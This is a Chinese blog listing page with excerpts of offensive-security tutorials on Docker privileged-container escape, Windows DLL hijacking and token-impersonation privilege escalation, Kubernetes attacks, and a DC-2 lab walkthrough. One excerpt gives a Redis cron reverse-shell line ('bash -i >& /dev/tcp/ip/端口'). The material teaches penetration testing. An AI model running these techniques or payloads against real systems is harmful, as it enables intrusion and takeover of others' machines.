- 博客(8)
- 收藏
- 关注
RSS订阅原创 云原生-docker
docker run --rm --privileged=true -it alpine //启用--privileged=true,container内的root拥有真正的root权限,可能让攻击者利用此进行容器逃逸。在容器内部执行下面的命令,从而判断容器是不是特权模式,如果是以特权模式启动的话,CapEff 对应的掩码值应该为 0000003fffffffff 或者是 0000001fffffffff。在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部。找到当前容器在宿主机下的绝对路径。
2025-06-05 12:53:27
956
原创 权限提升-3
如果这些DLL不存在,则通过在应用程序要查找的位置放置恶意DLL来提权。psexec.exe -accepteula -i -s -d cmd.exe #加上-accepteula参数,避免弹出许可协议。在掌握的权限中,需要知道有哪些应用,应用知道后怎么分析调用的dll,尝试对dll文件进行覆盖,程序被执行后就会调用覆盖的dll。将msf.dll替换成应用程序调用的dll文件,后重新启动应用(更偏向于钓鱼)过程:信息收集-进程调试-制作dll并上传-替换dll-等待启动应用成功。
2025-06-05 12:52:41
417
原创 权限提升-2
set yy "\n\n\n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n\n\n"注意:Centos会忽略乱码取执行格式正确的任务计划,而ubuntu并不会忽略这些代码,所有导致命令执行失败。利用条件:Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态。利用条件:Redis服务使用ROOT账号启动,安全模式protected-mode处于关闭状态。条件:ROOT密码(高版本的-secure-file-priv没进行目录限制)
2025-06-05 12:51:28
744
原创 权限提升-1
土豆系列提权的核心是NTLM中继,通过欺骗运行在高权限(Administrator/SYSTEM)的账户进行ntlm认证,同时作为中间人对认证过程进行劫持和重放,最后调用本地认证接口使用高权限账号的ntml认证获取一个高权限token,只要当前进程拥有SeImpersonatePrivilege权限即可进行令牌模仿,即可取得对应权限。该工具支持 Windows XP 到 Windows 11 之间的所有 Windows 操作系统,包括其对应的 Windows Server 版本。
2025-06-05 12:50:56
867
原创 云攻防-K8S安全
在 K8S 中,利用污点(Taint)进行横向移动渗透是指攻击者通过操纵或绕过集群中的污点和容忍(Toleration)机制,将恶意负载(Pod)调度到原本受保护的节点上,从而突破隔离并进一步渗透集群。一种是在本身就存在着不需要登录的 http 接口,但接口本身并不会暴露出来,如接口被暴露在外,就会导致 dashboard 未授权。: 实战中在安装 k8s 默认的配置 2379 只会监听本地,如果访问没设置 0.0.0.0 暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合 ssrf 或其他。
2025-06-05 12:48:57
1018
原创 汇编从零到精通
cpu是计算机的核心部件,它控制着整个计算机的运作进行计算。要想让一个cpu工作,就必须向他提供指令和数据。指令和数据在存储器中存放,就是内存。
2024-12-06 23:12:30
2116
原创 dc-2靶场思路
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。flag1的大概意思是提示用cewl来获取密码,所有应该是爆破密码之类的,且提示自己的密码字典可能无效,且有时没法获得所有密码,提示用其他的身份去登录。wpscan --url http://dc-2 --enumerate p 扫描插件。修改hosts文件,添加靶机IP到域名dc-2的指向。
2024-12-06 17:34:23
1800
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人